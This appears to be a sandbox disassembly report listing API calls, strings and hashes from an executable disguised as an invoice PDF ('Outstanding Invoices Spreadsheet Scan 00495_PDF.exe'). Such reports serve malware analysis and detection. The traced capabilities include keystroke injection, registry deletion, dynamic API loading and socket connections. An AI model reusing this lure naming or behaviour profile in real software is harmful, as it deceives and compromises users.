                                                                              • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                                • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: CurrentHandleProcess$Duplicate
                                                                              • String ID: nul
                                                                              • API String ID: 2124370227-2873401336
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,75922EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: CurrentHandleProcess$Duplicate
                                                                              • String ID: nul
                                                                              • API String ID: 2124370227-2873401336
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                              • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                              • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                              • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                              • String ID: SysAnimate32
                                                                              • API String ID: 3529120543-1011021900
                                                                              APIs
                                                                              • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                              • TranslateMessage.USER32(?), ref: 0044308B
                                                                              • DispatchMessageW.USER32(?), ref: 00443096
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Message$Peek$DispatchTranslate
                                                                              • String ID: *.*
                                                                              • API String ID: 1795658109-438819550
                                                                              APIs
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                              • GetFocus.USER32 ref: 004609EF
                                                                                • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                                • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                              • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                                              • __swprintf.LIBCMT ref: 00460A7A
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                              • String ID: %s%d
                                                                              • API String ID: 991886796-1110647743
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: _memset$_sprintf
                                                                              • String ID: %02X
                                                                              • API String ID: 891462717-436463671
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0042CD00
                                                                              • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,?,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,004A8E80,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,0040F3D2), ref: 0040FFCA
                                                                                • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                                • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                                • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                              • String ID: $OH$@OH$X
                                                                              • API String ID: 3491138722-1394974532
                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                              • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                              • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                              • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                              • String ID:
                                                                              • API String ID: 2449869053-0
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                              • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                              • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                              • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                              • SendInput.USER32 ref: 0044C509
                                                                              Similarity
                                                                              • API ID: KeyboardMessagePostState$InputSend
                                                                              • String ID:
                                                                              • API String ID: 3031425849-0
                                                                              APIs
                                                                              • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                              • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                              Similarity
                                                                              • API ID: Enum$CloseDeleteOpen
                                                                              • String ID:
                                                                              • API String ID: 2095303065-0
                                                                              APIs
                                                                              • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                                              • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                                              • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                              Similarity
                                                                              • API ID: PrivateProfile$SectionWrite$String
                                                                              • String ID:
                                                                              • API String ID: 2832842796-0
                                                                              APIs
                                                                              • GetClientRect.USER32(?,?), ref: 00447997
                                                                              • GetCursorPos.USER32(?), ref: 004479A2
                                                                              • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                              • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                              • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                              Similarity
                                                                              • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 1822080540-0
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                              • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                              • EndPaint.USER32(?,?), ref: 00447CD1
                                                                              Similarity
                                                                              • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                              • String ID:
                                                                              • API String ID: 659298297-0
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 004478A7
                                                                              • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                              • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                              • GetCursorPos.USER32(?), ref: 00447935
                                                                              • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                              Similarity
                                                                              • API ID: CursorMenuPopupTrack$Proc
                                                                              • String ID:
                                                                              • API String ID: 1300944170-0
                                                                              APIs
                                                                              • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                              • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                              • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                • Part of subcall function 004413F0: SendMessageW.USER32(02FD1B28,000000F1,00000000,00000000), ref: 004414C6
                                                                                • Part of subcall function 004413F0: SendMessageW.USER32(02FD1B28,000000F1,00000001,00000000), ref: 004414F1
                                                                              Similarity
                                                                              • API ID: Window$EnableMessageSend$LongShow
                                                                              • String ID:
                                                                              • API String ID: 142311417-0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0044955A
                                                                                • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                              • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 004495B3
                                                                              • _wcslen.LIBCMT ref: 004495C1
                                                                              • _wcslen.LIBCMT ref: 004495CE
                                                                              • SendMessageW.USER32(?,00001060,00000000,?), ref: 004495FF
                                                                              Similarity
                                                                              • API ID: MessageSend_wcslen$_memset_wcspbrk
                                                                              • String ID:
                                                                              • API String ID: 1843234404-0
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 00445721
                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                              • _wcslen.LIBCMT ref: 004457A3
                                                                              • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                              Similarity
                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                              • String ID:
                                                                              • API String ID: 3087257052-0
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 00459DEF
                                                                              • GetForegroundWindow.USER32 ref: 00459E07
                                                                              • GetDC.USER32(00000000), ref: 00459E44
                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                              Similarity
                                                                              • API ID: Window$ForegroundPixelRelease
                                                                              • String ID:
                                                                              • API String ID: 4156661090-0
                                                                              APIs
                                                                                • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                              • socket.WSOCK32(00000002,00000001,00000006), ref: 00464985
                                                                              • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                              • connect.WSOCK32(00000000,00000000,00000010), ref: 004649CD
                                                                              • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                              • closesocket.WSOCK32(00000000), ref: 00464A07
                                                                              Similarity
                                                                              • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 245547762-0
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 00447151
                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                              • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                              • BeginPath.GDI32(?), ref: 004471B7
                                                                              • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              Similarity
                                                                              • API ID: Object$Select$BeginCreateDeletePath
                                                                              • String ID:
                                                                              • API String ID: 2338827641-0
                                                                              • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                              • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                              • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                              • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                              Similarity
                                                                              • API ID: CounterPerformanceQuerySleep
                                                                              • String ID:
                                                                              • API String ID: 2875609808-0
                                                                              • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                              • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                              • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                              • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                                              APIs
                                                                              • SendMessageW.USER32 ref: 0046FD00
                                                                              • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                              • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                              • DestroyIcon.USER32(?), ref: 0046FD58
                                                                              • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                              Similarity
                                                                              • API ID: MessageSend$DestroyIcon
                                                                              • String ID:
                                                                              • API String ID: 3419509030-0
                                                                              • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                              • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                              • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                              • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                              APIs
                                                                              • __getptd.LIBCMT ref: 004175AE
                                                                                • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                              • __amsg_exit.LIBCMT ref: 004175CE
                                                                              • __lock.LIBCMT ref: 004175DE
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                                                              • InterlockedIncrement.KERNEL32(02FD2D48), ref: 00417626
                                                                              Similarity
                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                              • String ID:
                                                                              • API String ID: 4271482742-0
                                                                              • Opcode ID: cef6af0c730a10c674891530ba4a9f92a8997b3b581fa775581189220e01fce3
                                                                              • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                              • Opcode Fuzzy Hash: cef6af0c730a10c674891530ba4a9f92a8997b3b581fa775581189220e01fce3
                                                                              • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteObjectWindow$Icon
                                                                              • String ID:
                                                                              • API String ID: 4023252218-0
                                                                              • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                              • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                              • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                              • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                              • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                              • MessageBeep.USER32(00000000), ref: 0046036D
                                                                              • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                              • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                              Similarity
                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 3741023627-0
                                                                              • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                              • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                              • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                              • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Similarity
                                                                              • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                              • String ID:
                                                                              • API String ID: 1489400265-0
                                                                              • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                              • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                              • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                              • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                              APIs
                                                                                • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 1042038666-0
                                                                              • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                              • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                              • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                              • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                              • String ID:
                                                                              • API String ID: 2625713937-0
                                                                              • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                              • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                              • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                              • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                              APIs
                                                                                • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                              • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                              • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                              • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                              • ExitThread.KERNEL32 ref: 0041410F
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                              • __freefls@4.LIBCMT ref: 00414135
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                              • String ID:
                                                                              • API String ID: 132634196-0
                                                                              • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                              • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                                              • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                              • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                                              APIs
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                                • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                              • __getptd_noexit.LIBCMT ref: 00415620
                                                                              • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                                                                              • __freeptd.LIBCMT ref: 0041563B
                                                                              • ExitThread.KERNEL32 ref: 00415643
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 3798957060-0
                                                                              • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                              • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                              • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                              • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                                              APIs
                                                                                • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                              • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                              • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                              • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                              • ExitThread.KERNEL32 ref: 004156BD
                                                                              • __freefls@4.LIBCMT ref: 004156D9
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                              • String ID:
                                                                              • API String ID: 1537469427-0
                                                                              • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                              • Instruction ID: 6f4b581ce684dac4bce1a6396b1ab204a3b2196504341234b7a244e47b3a25b0
                                                                              • Opcode Fuzzy Hash: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
                                                                              • Instruction Fuzzy Hash: 83E0E6308003096BCF0037F29E1A9DF392DAD41389B52841E7E14B2122DE6DD9D1466D
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: _memcmp
                                                                              • String ID: '$[$h
                                                                              • API String ID: 2931989736-1224472061
                                                                              • Opcode ID: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                              • Instruction ID: c2eec353cbd26a418970a1643da97c958d9efd09d44d369c5aec2a2e92b02032
                                                                              • Opcode Fuzzy Hash: b65a2ba19e68ffe8a11284d2d069350b2f2ae6a9059e42b54d6f98484e49560c
                                                                              • Instruction Fuzzy Hash: EBE1B3756083858FE725CF28C8807ABBBE1FFC9304F18896EE89587341D7799849CB56
